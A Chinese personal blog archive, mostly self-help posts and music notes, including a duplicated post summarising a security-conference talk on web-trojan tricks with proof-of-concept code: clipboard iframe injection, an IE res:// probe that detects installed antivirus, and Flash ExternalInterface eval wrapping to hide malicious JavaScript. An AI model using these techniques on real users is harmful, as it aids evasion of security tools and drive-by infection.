神思者9首常用作武侠剧背景音乐的配乐(附下载)

www.u148.net

1、故宫的记忆Palace Memories
上次已经提到,这是神思者为日本NHK电视台纪有暗香盈袖录片《故宫至宝》所作的配乐。每一集《故宫至宝》的片头可以看到,在音乐的烘托下,故宫的大门缓缓开启,里面就是庄严肃穆的太和殿,在黑暗中显得幽静高贵,神秘莫测。
整个音乐给人一种无可言状的磅礴气势,让人不由的心生敬意。荡气回肠的音符,有如一次梦幻般的神奇旅行,古老壮丽的风景翩翩掠过,浑厚文明的画卷一一换化成音符来展现。梦醒时分,大幕落下,看尽世事,洗尽铅华,带着丝丝感伤与无奈,乐声渐渐隐去。
这首曲子经常被引用于中国的宫廷古装剧中,也被央视十套用作《百家讲坛》讲述清宫历史时的背景音乐。

Palace Memories

2、妙音鸟Myoonchou
妙音鸟是喜马拉雅山的一种鸟,能发妙音,是佛教“极乐世界”之鸟。它叫迦陵频伽,是梵语KALAVIUKA的音译。
妙音鸟给人一种雪山空蒙,灵动清新的景象,是TVB里经常用的一首曲子,孟飞版的《雪山飞狐》中,胡一刀和其妻相遇时,用的便是这段音乐(每当有白雪茫茫,只有一人或两人渺小地站在雪山中的场景时一般也会出现这段音乐)。而在琼瑶阿姨的电视剧里,只要男女主角一起散步,就常以此曲伴奏。

妙音鸟(Myoonchou)

3、海之女神Aphrodite
主旋律让人感觉身处广阔大海的星夜,而后面副曲的过渡,又给人另一种完全不同的感受。“大气而不失婉约,柔和而不失力度。”
《雪山飞狐》中苗人凤初次话别南兰的时候用的便是这首曲子作为BGM。

海之女神(Aphrodite)

4、望夫女Sigiriya lady
开场就很大气,在竖琴的序幕以后,用了一段大提琴,哀而不伤的全曲展开,远去的丈夫会不会有重逢的一天呢?女性的动人,在于她们常常把丈夫看成最重要的部分,把人生都献给爱情。一曲《望夫女》,足以使人感慨。
《梅花烙》和91版《雪山飞狐》都曾用到。

望夫女(Sigiriya lady)

5、迦罗Kyara
迦罗是汉语黑天,梵文战神的意思。神思者的这首乐曲,明显吸收了印度文化的精髓。开始,是若有若无的驼铃声,而后逐渐变化成缤纷的旋律,好似面前一个飞天,手持彩练当空舞。
印度的佛像姿态要比中国的佛像活泼的多,反手翘角,有些动感让人忍俊不禁。有人说,除了文化的渊源不同,印度大部分地区温度高,对身体的灵动感受就强。
《醉打金枝》中在长乐坊用过这段音乐,节奏欢快流畅,可用于表现幽默滑稽的氛围。

迦罗(Kyara)

6、思禅Scian
古天乐版的《乾隆大帝》曾引用过(港剧《齐天大圣》中也经常出现),和Palace Memories一样大气。
前面有一段前奏比较平,不过这段前奏过后,犹如“帝王踏入正殿时转身的一刹那”,既磅礴又有柔情,是略带清冷的那种豪迈。

思禅(Scian)

7、安敦anton
这是《海上丝路》专辑里的第9首曲子,全曲都有一种动荡不安的感觉,好像暴风雨就要来临了。是危胁来临的前奏。
但它的名字却是安敦,安敦就是安顿,全专辑最不安宁的曲子却用了“安顿”这个名字。
《雪山飞狐》中福康安出场时候的音乐,94版《射雕英雄传》也曾用过。

安敦(anton)

8、快乐的阿拉伯半岛HAPPY ARABIA,又名海上绿洲)
拍子收放自如,有一种智者的幽默感。仁者乐山,智者乐水。
出现在《雪山飞狐》中,前三十秒被张智霖、朱茵版的《射雕英雄传》多次引用。通常是一对痴男怨女久别重逢相拥时用到。

快乐的阿拉伯半岛(HAPPY ARABIA)

9、南十字星THE SOUTHERN CROSS
“少年已不是,江湖仍无常,一不留神就会被水呛着。虽说行走江湖,身不由己,但仍仗笔而依,雄心不死。略带古韵的曲调一飘出,脑中顿能浮现侠客义士的洒然清脱。”
很多TVB武侠剧的背景音乐,如94版射雕,在牛家村,程瑶珈找郭靖时用到。一般为侠侣游山玩水时常用的配乐。

南十字星(THE SOUTHERN CROSS)

Posted in 天籁之音 | Leave a comment

xKungfoo上的网马猥亵技巧

第一个、剪贴板劫持挂马

其实这是针对富文本编辑器的一种隐蔽的攻击方式,当你粘贴某段从别处拷贝来的文字时,就会执行一个iframe标签对象(富文本编辑器的性质),iframe加载网马。简单的demo:

<iframe src=http://www.baidu.com/ height=110 width=110></iframe>
<script>
var iframe = document.getElementsByTagName("iframe")[0];
var rng = document.body.createControlRange();
rng.add(iframe);
rng.execCommand('Copy');
</script>

只在IE6下有效,如何去扩展就看各位了,其实一般这样猥亵的技巧仅供娱乐,真正的运用,我觉得也是不太可能的,除非它变得更加猥亵。

第二个、img远程域检测本地域软件安装情况

网马要检测本地安装什么软件?无非就是那些安全软件,卡巴、小红伞、360、365门神(AD:顺便说下,365不是畅游巡警的山寨- -,和360的定位是不一样的)之类。稳定的demo:

<script>
////////////////////////////////////////////////////////
//Name: img标签远程域检测本地域软件是否存在poc
//Description: IE浏览器都有效
//Author: Knownsec Team
//Date: 2008-11-03
////////////////////////////////////////////////////////
knownImg = {}
knownImg.resList = [ //数组中填写本地软件id值与图片地址值(res协议或file协议)
{id: 'Avira', res: 'res://C:\\Program%20Files\\Avira\\AntiVir%20PersonalEdition%20Classic\\setup.dll/#2/#132'},
{id: 'baidu', res: 'res://C:\\Program%20Files\\baidu\\Baidu%20Hi\\BaiduHi.exe/#2/#152'},
{id: 'Super Rabbit', res: 'res://C:\\Program%20Files\\Super%20Rabbit\\MagicSet\\timedate.exe/#2/BBNO'},
{id: '365Menshen', res: 'res://C:\\Program%20Files\\365Menshen\\menshen.exe/#2/#227'},
{id: 'quicktime', res: 'res://c:\\program%20files\\quicktime\\quicktimeplayer.exe/#2/#403'}
];
knownImg.ok_resList = new Array(); //确认软件存在时,填入此数组
knownImg.tmp_resList = new Array();

knownImg.checkSoft = function(){ //检测函数
if (document.all){
x = new Array();
for (i = 0; i < knownImg.resList.length; i++){
x[i] = new Image();
x[i].src = "";
knownImg.ok_resList.push(knownImg.resList[i].id); //将resList里的id值依次扔进ok_resList数组中
x[i].onload = function(){
//alert(knownImg.resList[i].id + ': return true');
}
x[i].onerror = function(){
//alert(knownImg.resList[i].id + ': return false');
knownImg.ok_resList.pop(); //软件不存在时,从ok_resList数组弹出对应的id值
}
x[i].src = knownImg.resList[i].res;
}
}
}
knownImg.checkSoft();

alert(knownImg.ok_resList); //弹出
document.write('你的系统中存在以下软件:<br />'+knownImg.ok_resList.join('<br />'));
</script>

IE6/7/8通杀,我写完这个POC没几天就被告之老外早已经给出POC了,上面这些代码是我们自己探讨出来的,当时对res协议还不太懂,还问了一些朋友。现在我们的这个POC扩展性好,很稳定。大家可以改改直接使用。

第三个、利用Flash封装网马

这个更加猥亵,我们使用服务端技术保护网马,保护来保护去,网马的JS代码还是会被抓到,在那些浏览器抓包工具下,网马的JS暴露无遗,原理很简 单,网马再怎么通过判断(比如通过Cookie,IP,referer等)来保护自己,为了危害用户,总是要输出JS来给浏览器去执行,那么就会暴露网马 JS代码。那就没什么办法保护我们的网马JS代码了?有……

我们使用Flash来封装网马,这样,使用Flash AS的扩展API:ExternalInterface类,这个类是AS与JS直接通信的最好方式,比如如下AS代码:

import flash.external.*;
ExternalInterface.call("eval","alert(document.domain);function ajax(){var request = false;if(window.XMLHttpRequest) {request = new XMLHttpRequest();} else if(window.ActiveXObject) {var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];for(var i=0; i<versions.length; i++) {try {request = new ActiveXObject(versions[i]);} catch(e) {}}}return request;}var xhr = ajax();function post_it(){var cmd = 'cmd=hi';xhr.open ('POST', 'create_cmd.php', false);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xhr.send(cmd);}post_it();");

上面的代码原理是什么呢,ExternalInterface类的call方法可以直接使用Flash容器(这里是HTML页)的JS函数,它有两 个参数,第一个是要调用的JS函数名,第二个是被调用的JS函数要执行的参数。我们这里其实是劫持了eval函数,这是JS的内置函数,利用它可以执行任 意的JS代码。根据这个原理,我们可以将所有的JS代码封装在Flash文件中。

G使用这个方法成功封装了06014网马,并对我们的Flash压缩加密保护,使用一般的Flash反编译软件是破解不了的,而且在网马的执行过程中,是无法通过浏览器抓包工具抓到网马的JS代码。这就起到了不错的保护作用 :)

第四个、Web2.0蠕虫式挂马

这个要怎么说呢,传统的挂马方式危害很大的有mass sql injection,在短时间内批量注入挂马。我们至今没见到Web2.0蠕虫式的挂马,大家讨论了认为:这是成本问题(但是是不是这样我就不知道了), 不是谁都可以轻易写出Web2.0蠕虫。不过大风今天在xKungfoo上说今后会让大家很方便写出XSS蠕虫的,那就是anehta平台将会提供打包一些蠕虫功能。

Web2.0蠕虫现在有两种表现形式:XSS蠕虫与CSRF蠕虫。在Web2.0蠕虫的传播过程中完全可以挂马。以前放出的一些Web2.0蠕虫都是一个玩笑,没给出危害,但是千万不要认为这永远都是黑客的一个玩笑。我们相信挂马的方式会出现这个的……

恩,这就是今天G的演讲内容的其中一部分。还有一些猥亵的技巧,也许对我们的Webscan全网监控系统都是一个挑战,不过我相信普通挂马者不会使用某些猥亵技巧,那就仅当娱乐吧

Posted in 学习日记 | Leave a comment

xKungfoo上的网马猥亵技巧

第一个、剪贴板劫持挂马

其实这是针对富文本编辑器的一种隐蔽的攻击方式,当你粘贴某段从别处拷贝来的文字时,就会执行一个iframe标签对象(富文本编辑器的性质),iframe加载网马。简单的demo:

<iframe src=http://www.baidu.com/ height=110 width=110></iframe>
<script>
var iframe = document.getElementsByTagName("iframe")[0];
var rng = document.body.createControlRange();
rng.add(iframe);
rng.execCommand('Copy');
</script>

只在IE6下有效,如何去扩展就看各位了,其实一般这样猥亵的技巧仅供娱乐,真正的运用,我觉得也是不太可能的,除非它变得更加猥亵。

第二个、img远程域检测本地域软件安装情况

网马要检测本地安装什么软件?无非就是那些安全软件,卡巴、小红伞、360、365门神(AD:顺便说下,365不是畅游巡警的山寨- -,和360的定位是不一样的)之类。稳定的demo:

<script>
////////////////////////////////////////////////////////
//Name: img标签远程域检测本地域软件是否存在poc
//Description: IE浏览器都有效
//Author: Knownsec Team
//Date: 2008-11-03
////////////////////////////////////////////////////////
knownImg = {}
knownImg.resList = [ //数组中填写本地软件id值与图片地址值(res协议或file协议)
{id: 'Avira', res: 'res://C:\\Program%20Files\\Avira\\AntiVir%20PersonalEdition%20Classic\\setup.dll/#2/#132'},
{id: 'baidu', res: 'res://C:\\Program%20Files\\baidu\\Baidu%20Hi\\BaiduHi.exe/#2/#152'},
{id: 'Super Rabbit', res: 'res://C:\\Program%20Files\\Super%20Rabbit\\MagicSet\\timedate.exe/#2/BBNO'},
{id: '365Menshen', res: 'res://C:\\Program%20Files\\365Menshen\\menshen.exe/#2/#227'},
{id: 'quicktime', res: 'res://c:\\program%20files\\quicktime\\quicktimeplayer.exe/#2/#403'}
];
knownImg.ok_resList = new Array(); //确认软件存在时,填入此数组
knownImg.tmp_resList = new Array();

knownImg.checkSoft = function(){ //检测函数
if (document.all){
x = new Array();
for (i = 0; i < knownImg.resList.length; i++){
x[i] = new Image();
x[i].src = "";
knownImg.ok_resList.push(knownImg.resList[i].id); //将resList里的id值依次扔进ok_resList数组中
x[i].onload = function(){
//alert(knownImg.resList[i].id + ': return true');
}
x[i].onerror = function(){
//alert(knownImg.resList[i].id + ': return false');
knownImg.ok_resList.pop(); //软件不存在时,从ok_resList数组弹出对应的id值
}
x[i].src = knownImg.resList[i].res;
}
}
}
knownImg.checkSoft();

alert(knownImg.ok_resList); //弹出
document.write('你的系统中存在以下软件:<br />'+knownImg.ok_resList.join('<br />'));
</script>

IE6/7/8通杀,我写完这个POC没几天就被告之老外早已经给出POC了,上面这些代码是我们自己探讨出来的,当时对res协议还不太懂,还问了一些朋友。现在我们的这个POC扩展性好,很稳定。大家可以改改直接使用。

第三个、利用Flash封装网马

这个更加猥亵,我们使用服务端技术保护网马,保护来保护去,网马的JS代码还是会被抓到,在那些浏览器抓包工具下,网马的JS暴露无遗,原理很简 单,网马再怎么通过判断(比如通过Cookie,IP,referer等)来保护自己,为了危害用户,总是要输出JS来给浏览器去执行,那么就会暴露网马 JS代码。那就没什么办法保护我们的网马JS代码了?有……

我们使用Flash来封装网马,这样,使用Flash AS的扩展API:ExternalInterface类,这个类是AS与JS直接通信的最好方式,比如如下AS代码:

import flash.external.*;
ExternalInterface.call("eval","alert(document.domain);function ajax(){var request = false;if(window.XMLHttpRequest) {request = new XMLHttpRequest();} else if(window.ActiveXObject) {var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];for(var i=0; i<versions.length; i++) {try {request = new ActiveXObject(versions[i]);} catch(e) {}}}return request;}var xhr = ajax();function post_it(){var cmd = 'cmd=hi';xhr.open ('POST', 'create_cmd.php', false);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xhr.send(cmd);}post_it();");

上面的代码原理是什么呢,ExternalInterface类的call方法可以直接使用Flash容器(这里是HTML页)的JS函数,它有两 个参数,第一个是要调用的JS函数名,第二个是被调用的JS函数要执行的参数。我们这里其实是劫持了eval函数,这是JS的内置函数,利用它可以执行任 意的JS代码。根据这个原理,我们可以将所有的JS代码封装在Flash文件中。

G使用这个方法成功封装了06014网马,并对我们的Flash压缩加密保护,使用一般的Flash反编译软件是破解不了的,而且在网马的执行过程中,是无法通过浏览器抓包工具抓到网马的JS代码。这就起到了不错的保护作用 :)

第四个、Web2.0蠕虫式挂马

这个要怎么说呢,传统的挂马方式危害很大的有mass sql injection,在短时间内批量注入挂马。我们至今没见到Web2.0蠕虫式的挂马,大家讨论了认为:这是成本问题(但是是不是这样我就不知道了), 不是谁都可以轻易写出Web2.0蠕虫。不过大风今天在xKungfoo上说今后会让大家很方便写出XSS蠕虫的,那就是anehta平台将会提供打包一些蠕虫功能。

Web2.0蠕虫现在有两种表现形式:XSS蠕虫与CSRF蠕虫。在Web2.0蠕虫的传播过程中完全可以挂马。以前放出的一些Web2.0蠕虫都是一个玩笑,没给出危害,但是千万不要认为这永远都是黑客的一个玩笑。我们相信挂马的方式会出现这个的……

恩,这就是今天G的演讲内容的其中一部分。还有一些猥亵的技巧,也许对我们的Webscan全网监控系统都是一个挑战,不过我相信普通挂马者不会使用某些猥亵技巧,那就仅当娱乐吧

Posted in 杂谈 | Leave a comment

关于钓鱼式攻击的解释

有个例子,我也不记得以前说过没有。

钓鱼式攻击是什么东西呢?其实很简单:

某人Email给你:给我500块,预知你的未来,可以提前通知你,明天国王跟火箭队的比赛,火箭队会赢!

你当然不信啦,但是第二天的比赛,火箭队真的赢了,你说:巧合,巧合而已。

过了几天,他又email给你:给我500快,预知你的未来,可以提前通知你,明天湖人跟火箭队的比赛,湖人赢了。

你有点好奇,但你是绝对不会把钱给他的,但是第二天的比赛,湖人真赢了,你说:诶?难道是潜规则?

又过了几天,他又email给你:给我500快,预知你的未来,可以提前通知你,明天湖人跟七六人队的比赛,湖人赢了。

你开始猜,是不是真的啊?但第二天的比赛,湖人又赢了。

......

经过若干次循环后,你终于想要预知你的未来了。但是当你把钱汇出去没有得到答复时,你才知道上当了!

因为事情是这样的:

第一次发信8192封,一半说国王赢,一般说火箭赢;

第二次只给说火箭赢的4096人发信,分为2048人为湖人赢,2048为火箭赢;

第三次只给说湖人赢的2048人发信,分为1024人为湖人赢,1024为七六人赢;

......

很有可能他最终欺骗到的人只有10,但是这已经足够!

所以你可以说钓鱼式攻击一点技术含量都没有,不过可能你仍会因此被骗。

另外钓鱼者超多,请小心诱饵!

Posted in 杂谈 | Leave a comment

一个月培养一个好习惯

俗话说:命好不如习惯好。一个好习惯,无论其大小,带来的影响将是巨大的,有益于你一生的。

习惯决定命运,可是好习惯并非自然而成的,自然而成的常常是懒惰、生活无规律等等坏习惯。所以我们才要自我控制来培养好习惯,而且这样的培养也不是件容易的事情。于是,弥缝决定发起这样一个活动。

我们为什么需要培养好习惯:

当人一味追求快速成功,渴求拥有大智慧时,往往忽略了良好的习惯才是步向成功的钥匙。好习惯一旦形成,它就极具稳定性。心理上的行为习惯左右着我们的思维方式,决定我们的待人接物;生理上的行为习惯左右着我们的行为发生,决定我们的生活起居。世界著名心理学家威廉·詹姆士这么说的:

播下一个行动,收获一种习惯;
播下一种习惯,收获一种性格;
播下一种性格,收获一种命运。

可见,好的习惯是十分重要的,它可以让人的一生发生重大变化。满身恶习的人,是成不了大气候的,惟有有好习惯的人,才能实现自己的远大目标

参考阅读:让我们“晒”习惯

什么是一个月培养一个好习惯:

一个习惯的培养并非一朝一夕便可以完成的。它需要经过长期、反复地坚持,最后才能成为一个不易抛弃的真正的习惯。研究表明培养一个习惯需要三个月的时间,但是习惯培养的第一个月是最重要的。俗话说“一个良好的开始是成功的一半”,所以弥缝希望发起这项活动——大家在一个月里只培养一个好习惯。而且大家可以在一起相互鼓励,共同进步。想想当你培养这一个好习惯时,同时还有其他更多的人再和你一样努力坚持,你一定会更有信心去完成它和成功地培养这一个习惯!

而且,一旦我们成功的改掉第一个习惯,以后改掉坏习惯就将变得越来越容易。事实上,随着一个个坏习惯被好习惯逐个取代,我们将变得越来越善于改变自己的习惯。也就是说,我们已经在开始养成“改掉坏习惯”的习惯。一旦这样的习惯养成,我们便会像一列运动着无法停止脚步的火车那样,推动我们实现自己的理想。

为了更好的使大家能一起分享进度和进行讨论,弥缝建立了一个QQ群:8964762。使用豆瓣的朋友,也可以到褪墨小组上分享。欢迎大家加入!

你该培养一个什么样的好习惯:

一个好习惯何其多,无论其大小。你只要坚持培养下来了,都是件非常好的、有益的事情了。不过弥缝简单地列举一些好习惯:

  • 每天早起十分钟
  • 每天准时七点起床
  • 每天准时十二点睡觉
  • 每天阅读半小时
  • 每天只上网三小时
  • 每看一小时电脑,休息十分钟
  • 每天少看电视十分钟
  • 每天背二十个单词
  • 每天跑步一千米
  • 每天陪子女谈心十分钟
  • 每天按时三餐
  • 每天按时回家享用晚餐
  • 每周做日程回顾
  • 每天早晨列举今天最重要的任务
  • 每天清理收件箱
  • 等等…

参考阅读:

  1. 简单做(ZTD)的十个好习惯总结
  2. 让每一天拥有更多的时间
  3. 怎么让一天有36小时
  4. 如何减少睡眠时间却保持健康
  5. 如何保证睡眠质量
  6. 通往成功,每周回顾你的目标
  7. 设置每天最重要的任务

如何培养一个好习惯?

  • 坚持一个月30天已经足够让你培养一个永久不变的好习惯了。时间太短则不能根植到你的大脑内,形成长久的习惯。若坚持时间很长但仍然失败往往是由于失败的策略,因为这时候时间的长短并不再是决定性因素。
  • 一次只培养一个好习惯。要改变习惯,就要集中于改变这一个习惯。一次改掉多个习惯的企图,势必分散我们的精力,并彻底毁掉我们改掉坏习惯的能力。
  • 使用一款好的记录工具。参考弥缝制作的《习惯培养清单
  • 制定明确的目标。“每天早起”是一个明确的目标吗?答案是否定的,早起是什么定义,八点还是九点?明确你的目标,将它换成“每天7点起床”或者“每天早起10分钟”效果一定更好。
  • 告诉你的亲人或朋友。弥缝觉得这是促使你坚持培养习惯的最好方法。他们不仅可以监督你,还能够给你产生压力。当然,你也可以让他们一起来培养习惯。
  • 做每周回顾。回顾自己在过去一周取得的进展,遇到的问题。解决问题,体验你的收获,给点小小奖励。做得好,就继续坚持,集中于目标。
  • 小错误要好于大错误。如果你有几天空缺了习惯培养,千万不要放弃。赶快改正就可以了,犯小错误比犯个大错误好多了。不需要自责,如果你偷睡了一会儿,那就当作是前几天努力坚持习惯的小小奖励吧。

参考阅读:

  1. 为什么习惯培养总是失败
  2. 20个方法让你摆脱坏习惯
  3. 三个月培养一种新习惯
  4. 一个月培养一个好习惯[八月总结]
Posted in 学习日记 | Leave a comment

如何能够自律

“自律就是自由。”你可能会不同意,我想不同意的也不只你一个人。对许多人来说,自律是一个讨厌的词儿,因为它意味着没有自由。实际上,反过来才是正确的。如同Stephen R. Covey(弥缝注,《高效能人士的七个习惯》一书的作者)所写的那样:“不自律的人就是情绪、欲望和感情的奴隶”。从长远来讲,不自律的人是缺乏自由的,也无法得到随之而来的独特技能和能力,比如演奏乐器的技能或者说一门外语的能力。

自律指的是,在那一时刻,是你的想法决定你的行为而非你的感情。在对你的一生有很大影响的大事情面前,自律常常意味着牺牲乐趣和避免一时的冲动。因此,是自律驱使你做到:

  • 即使在最初的热情褪去后,仍然继续完成一个想法或者项目
  • 即使你非常想躺在沙发上看电视,也还是要去健身房健身
  • 早起工作
  • 面对诱惑时说“不”
  • 只在每天的特定时候有限次的查看你的邮箱

过去,自律是我的一个弱点,以至于现在我发现很多我曾经想做的事情都做不来,比如弹吉他。不过我已经有进步了,可以说是自律让我今天早上五点起床去跑步然后写下这篇文章的。相信我,要在从前,我现在是仍然蜷缩在床上的,但是这种想法被我的理智给克服了。

如果你正在与自律做着斗争的话,那么好消息是,它一定会对你有帮助的。以我为例,我可是花了两年的时间才让自己早点起床的啊。下面是我所发现的自律的五个特性。

  • 自知之明

自律意味着,你的行为取决于你能做出最好的决定这一信念,而非取决于你当时的情感。因此,自律的第一个特性就是自知之明。你需要决定什么行为最好地放映了你的目标和价值。这个过程需要自省和自我分析,而且如果你试着把它写下来那就最有效了。我强烈推荐花些时间来写下你的目标、梦想和抱负。如果能写出一个自己的任务条款就再好不过了。我发现,写下这样一个条款让我更加清楚我是谁、我要干嘛以及我的价值是什么。Covey博士的网站上有一个很棒的任务条款生成器

  • 清醒的认识

自律依赖于对你正在做的和还没有做的事情的清醒的认识。想想看吧。如果你都不知道你的行为是不自律的,你如何能够让自己自律呢?

当你开始自律的时候,你可能会捕捉到你自己的一些不自律的行为,比如咬手指、不想去健身房、吃一块蛋糕或者经常查看你的电子邮箱。自律很花时间,关键是你要意识到你的不自律的行为。随着时间的推移,这种意识会变得越来越简单,并使你在做不自律的事情之前就意识到,而不是要等到已经开始做的时候。这可以给你提供机会来做出对你的目标和价值来讲最好的决定。

  • 承诺自律

只是写出你的目标和价值是不够的。你必须对它们做出一个内心的承诺。否则,当你的闹钟在早上五点响起的时候,你会毫无愧疚的按下闹钟的打盹键来“再睡5分钟……”或者,当最初的热情从一个项目中褪去的时候,你会跟自己斗争是否要看到项目完成。

如果你要与承诺斗争,那么就要对你即将要做的事情做出一个有意识的决定了——什么时候你说你要做这件事来着?你当时是怎么说的来着?接着,我强烈建议你想办法来实践你的承诺。俗话说,“可测量者可改进”。

  • 勇气

不犯错的自律经常是极端困难的。情绪、欲望和感情会强有力地将阻止你前进。因此,自律是很需要勇气的。事实上当有些事情是非常困难和痛苦的时候,不要假装这些事情对你来说很容易做。随着你开始不断地积攒小的自我胜利,你将会更加自信,并且支撑你自律的自信将会变得更加自然。

  • 内心的训练

自己和自己内心说话的练习是双刃剑,但是如果你控制得好,它也可以变得极为有用。当你发现你的自律受到挑战的时候,我建议你和自己说话,鼓励自己并让自己放心。要知道,自己和自己说话可以提醒你你的目标,唤起你的勇气,强化你的承诺并使你对手中的任务保持清醒的头脑。当我发现我的自律正在被挑战的时候,我总是提 醒自己下面的话:“自律的代价总是要比后悔的代价低的”。把这句话铭刻在心吧,每当不想自律的时候提醒自己。这将改变你的生活。

Posted in 学习日记 | Leave a comment

首次从月球拍到的地球

这是上世纪最经典的天文相片,1966年环月1号(Lunar Orbiter 1)拍到的、以月球为前景的地球画面,比著名的阿波罗8号(Apollo 8) 拍到的同名姊妹照还要早两年。

最新的处理技术让古董资料获得更高的解析度,该图是环月影像恢复计划(Lunar Orbiter Image Recovery Project)的一部分,由 Nancy Evans 领佳节又重阳导完成。

对比近期的高解析度相片,可以研究月球表面经历的变化。

1、1966年环月1号拍到的

2、1968年阿波罗8号拍到的

3、2007年月神号太空船拍到的

Posted in 杂谈 | Leave a comment

让PHP支持SQL2005数据库的正确操作方法

最近因为自己的些想法 想用网页语言的方式查询SQL2005的数据库 自己又不喜欢ASP 所以就选择使用PHP作为开发语言(自己还没怎么学过 努力中~~~)下载了个由于是个懒人就选择了一件式的包APMServ.rar  效果还不错 包括了PHP和ASP还有CGI的平台。本以为就可以连接SQL了 结果死活连接不上 只有求助于 GOOGLE 从中得出了无数种结果 均不得行。只好在microsoft的SQL2005的专版下找到了答案 使用microsoft专用的DLL链接库才可以使PHP支持SQL2005

详见附件 解压后 将php_sqlsrv_ts.dll 和php_sqlsrv.dll 放置与/PHP/EXT 文件目录下 然后在/php 文件的PHP.INI中找到extension=这项 在其中添加extension=php_sqlsrv.dll
extension=php_sqlsrv_ts.dll

保存退出 然后重启apache 即可  SQL for PHP driver

Posted in 学习日记 | Leave a comment

引起辞职的10大原因

辞职的原因有很多,例如对薪资不满意,发展没有前途,每天的工作时间太长,工作任务太困难等等,这些都是会导致辞职的原因,如果你努力后不能改善这些导致你辞职的原因,那么还是从长计议,辞职吧!

下面是常见的引起辞职的10大原因:

  1. 你的公司业绩下滑(Your company is experiencing a downward spiral)
    你的公司可能正在遭遇业绩下滑,失去客户,赔钱,或者谣传公司要倒闭,破产
  2. 和上级的关系破裂(Your relationship with your manager is damaged beyond repair)
    你已经试着重新修复你和上级之间的关系,但是并不奏效,甚至难以修复。或许你不太受别人信任,很多天没有来上班,或许上司本身就是一个不值得信任的家伙。不管是什么原因,你们的关系是彻底破坏,无法修复了。
  3. 你的生活出现了变化(Your life situation has changed)
    也许你刚刚结婚,或者刚刚生了小孩,原来的薪水和奖金不足以维持日常开销,你需要跳槽到更高薪水的职位来养家糊口。

  4. 你的价值观与公司文化不相适应(Your values are at odds with the corporate culture)
    也许你的公司主张平等主义,但是你却认为应该按照薪水级别分配停车位。你的公司做年度的员工满意度调查,但是你却认为设置在浪费时间。你的公司是分不同等级的,而你却想让自己影响到不同的层面。不管你和公司存在什么样的冲突,缺乏与公司文化的融合意识必将毁掉你对待工作的态度。
  5. 你不能从工作中得到乐趣(You’ve stopped having fun and enjoying your job)
    不管改变了什么,当你早上起来觉得去上班有一种恐惧感时,那么你应该辞职了。
  6. 你的公司在道德上存在缺陷(Your company is ethically challenged)
    也许经理对顾客说谎,谎称产品的质量多么好,或者捏造这些货物运走的时间。你开始感觉这个公司好像在偷窃客户的信息。不管怎么样,不要继续待在一个没有道德的公司。
  7. 你的工作表现被认为不妥当(you have behaved in ways that are considered improper at work)
    你已经很多天没有来上班了,对工作掉以轻心,未能保持必要的技能,或者别人都认为你是失败者。这种不好的声誉,一旦获得就很难改变,所以,当你有机会的时候,还是考虑辞职吧!
  8. 你和同事之间的合作关系到头了(You’ve burned your bridges with your coworkers)
    你的团队已经没有继续协作下去的环境氛围了,同样,造成这种局面的原因已经不重要,重新开始一份新的工作并防止这种情形再次发生。
  9. 工作压力太大(Your stress level is so high at work)
    工作压力太大,影响了你的身体和心理健康,也影响了你和朋友以及家人之间的关系。想办法把造成的影响治愈,并学会应对压力的方法。
  10. 没有挑战性(You are unchallenged)
    你想负责更多的事务,想寻求你所在职位之外的更多机会,但是很有限。该是换工作的时候了!
Posted in 学习日记 | Leave a comment

如何停止拖延

事情有变化在所难免,但不应该成为拖延的借口。
想想你是不是很多次决定要看完一本书,但是没有坚持下去?
决定今天要完成某个目标,但是把时间不自觉地浪费在上网和发呆中?
觉得每天都过得差不多,很长时间没有看到自己的进步?
那么,停止这种浪费时间的行为吧,找出问题所在,让自己把该做的事情都按时做完。

  1. 知道自己为什么会拖延?
    你是否总是在担心完成不了任务?
    你是一个完美主义者吗,总是希望事情能都做得百分百完美?
    你是不是把事情的每一个小部分都安排好以后才开始工作?
    你是不是很容易心烦呢?
    你是不是很懒惰?

    把你认为可能的原因都列出来,看看哪些是导致你拖延的主要因素。然后试着用下面的方法改善你做事的方式。

  2. 将一件事情分割成几个小部分
    这点看起来容易,但是需要经验,因为分割后的每个小部分之间并不一定是完全独立的,可能需要你在做这个部分工作的同时,也要想到其他部分可能发生的情况。
    在每个小部分完成后,还需要花点时间把它们合起来。
  3. 限定完成期限
    如果你是一个没有什么时间观念的人,可以试试给自己强行制定出一段时间需要完成的任务。例如,在接下来的一个小时里,我要看完10页书。
  4. 分时段工作,不要连续工作
    注意劳逸结合,尝试用一到两个小时努力工作,搞出成果,然后给自己一个短暂的休息。不要持续拼命地工作,这样做未必有最高的工作效率。
  5. 从最简单的方面入手
    如果一项任务既庞大又复杂,让你觉得无从下手。那么你可以试试从最简单的方面入手,循序渐进。这样既可以节省时间,而且不会让自己有借口拖延。
    例如,如果你要写一篇学术性的论文,发现导论很难写,那么你可以先写论文的正文部分,或许写完正文,你的导论也就轻车熟路了。
  6. 让别人一同参与
    和你的家人,朋友或是同事打个赌,让他们证明你会在特定的时间完成了你的工作。或者用别的方式让自己克服懒惰,对应该完成的工作负起责任。
  7. 尽可能排除干扰
    如果你觉得做事情时总会受到干扰,试着找出原因,尽量排除干扰。或者搬到一个你可以专心做事的地方。如果你需要很专心的环境,关掉电视,电话,收音机和任何会让你从工作中分心的东西。

Posted in 学习日记 | Leave a comment